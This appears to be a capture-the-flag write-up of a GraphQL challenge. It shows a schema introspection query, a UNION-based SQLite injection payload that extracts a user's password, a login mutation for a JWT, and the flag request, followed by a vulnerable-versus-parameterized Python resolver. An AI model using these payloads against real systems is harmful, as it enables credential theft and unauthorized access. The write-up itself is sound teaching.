After we started searching, we found GraphQL on /graphql.
With the big introspection payload from PayloadsAllTheThings we can get all the schema information out of it.

For convenience, we can use the "GraphQL Voyager" extension in Burp Suite.

Request (sent as the JSON body `{"query": "<the query below>", "variables": null}`):

```
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types { ...FullType }
    directives { name description locations args { ...InputValue } }
  }
}

fragment FullType on __Type {
  kind name description
  fields(includeDeprecated: true) {
    name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason
  }
  inputFields { ...InputValue }
  interfaces { ...TypeRef }
  enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason }
  possibleTypes { ...TypeRef }
}

fragment InputValue on __InputValue {
  name description type { ...TypeRef } defaultValue
}

fragment TypeRef on __Type {
  kind name
  ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } }
}
```

We can paste the schema we received in the response into https://apis.guru/graphql-voyager/ and get an easy-to-view graph.

![](https://user-images.githubusercontent.com/83348650/133906491-7e76d659-ed62-4174-acb3-1953a4cfdb84.png)
In this graph we see that there is a "flag" query.
Let's try to send a request:
```
query {
  flag
}
```
But we get in response:
```
"message":"error authenticating user: invalid token"
```

After spending a lot of time on Google looking for information about
GraphQL, and sending a large number of requests, we found an SQLite injection in
the `post` query:
```
query UserQuery {
  post(name:"' union select 1,2,3,password,5,6 from users --") {
    content
  }
}
```
Response:
```
"content":"n8bboB!3%vDwiASVgKhv"
```
From the posts on the site we found the author's name: congon4tor.
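To show why the `post(name:)` argument was injectable and how the same resolver looks with a bound parameter, here is an added example (not the challenge's code). The in-memory database, table layout and column names are assumptions; only the six-column shape and the `content` position come from the payload above.

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge backend (layout is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        CREATE TABLE posts (id INTEGER, name TEXT, author TEXT,
                            content TEXT, created TEXT, tags TEXT);
        INSERT INTO users VALUES (1, 'congon4tor', 'n8bboB!3%vDwiASVgKhv');
        INSERT INTO posts VALUES (1, 'hello', 'congon4tor',
                                  'first post', '2021-09-01', 'misc');
    """)
    return db

# Six selected columns: the payload's "1,2,3,password,5,6" lines up with
# them so that the stolen value lands in column 4, which is "content".
POST_COLUMNS = "id, name, author, content, created, tags"

def resolve_post_vulnerable(db: sqlite3.Connection, name: str):
    """Resolver that splices the GraphQL argument straight into SQL.

    A closing quote in the argument ends the string literal, the UNION
    appends rows from another table, and "--" comments out the quote
    the template adds after the value."""
    sql = f"SELECT {POST_COLUMNS} FROM posts WHERE name = '{name}'"
    row = db.execute(sql).fetchone()
    return None if row is None else {"content": row[3]}

def resolve_post_fixed(db: sqlite3.Connection, name: str):
    """Same resolver with a bound parameter: the argument is only ever data,
    so the payload is compared as a literal post name and matches nothing."""
    sql = f"SELECT {POST_COLUMNS} FROM posts WHERE name = ?"
    row = db.execute(sql, (name,)).fetchone()
    return None if row is None else {"content": row[3]}

# The exact argument value from the writeup's request.
INJECTION = "' union select 1,2,3,password,5,6 from users --"

if __name__ == "__main__":
    db = build_db()
    print(resolve_post_vulnerable(db, INJECTION))  # {'content': 'n8bboB!3%vDwiASVgKhv'}
    print(resolve_post_fixed(db, INJECTION))       # None
    print(resolve_post_fixed(db, "hello"))         # {'content': 'first post'}
```

Logging resolvers whose string arguments contain quote characters or SQL keywords is a cheap detection for this class of probe, but the parameterized query is what actually closes it.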

Now we have the credentials congon4tor:n8bboB!3%vDwiASVgKhv

We need to get a token with these credentials.

With the help of my teammate jelly7183 we sent this request:
```
query {
  __schema {
    types {
      name, fields {
        name, args {
          name, description, type {
            name, kind, ofType {
              name, kind
            }
          }
        }
      }
    }
  }
}
```
Response:
```
"name":"authenticateUser"
```

Now we need to send a mutation request to authenticateUser.

Request:
```
mutation {
  authenticateUser(username:"congon4tor", password:"n8bboB!3%vDwiASVgKhv") {
    token
  }
}
```
Response:
```
"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjQ5MjksImlhdCI6MTYzMTk5MjEyOSwiaXNzIjoiQ29uZ29uNHRvciJ9.ObmWd65tvTGUOIAIo1u4XmiScZE00tvA7Gu_Dtm1cpQ"
```
Great, now we have a token; it remains to form a proper request to the "flag" query.
Add this header to the HTTP request:
```
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjE1NzIsImlhdCI6MTYzMTk4ODc3MiwiaXNzIjoiQ29uZ29uNHRvciJ9.Gqllh1rt_OHVcTWMfRREZy0pKPRxhlsvxQFw6Wu0rxE
```
and send
```
query {
  flag
}
```
and we have the flag in the response:
```
"flag":"flag{9d26b6e4a765ecd87fe03a1494c22236}"
```